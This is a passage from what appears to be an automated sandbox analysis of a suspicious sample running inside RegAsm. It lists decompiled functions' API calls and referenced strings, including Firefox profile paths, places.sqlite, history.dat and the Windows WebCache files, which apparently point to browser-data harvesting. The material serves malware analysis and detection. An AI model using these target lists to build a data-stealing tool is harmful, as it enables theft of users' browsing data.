                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                APIs
                                                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateErrorFileLastfree
                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                • String ID: $0.@
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                • API String ID: 1534475566-1174173950
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                • API String ID: 2925649097-2036018995
                                                                                                                                                                                APIs
                                                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                • String ID: "%s"
                                                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModuleProcessTimes
                                                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                • API String ID: 116129598-3385500049
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Strings
                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                • API String ID: 2887208581-2114579845
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                • String ID: $$8
                                                                                                                                                                                • API String ID: 1475443563-435121686
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1979745280-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                                                • API String ID: 2641622041-467022611
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                                                • String ID: }A
                                                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                                                APIs
                                                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$Load$AllocateDirectoryFreeHeapSystemmemsetwcscatwcscpy
                                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                                • API String ID: 3600401918-4050573280
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                • String ID: BINARY
                                                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 568699880-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                • String ID: /stext
                                                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1023896661-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
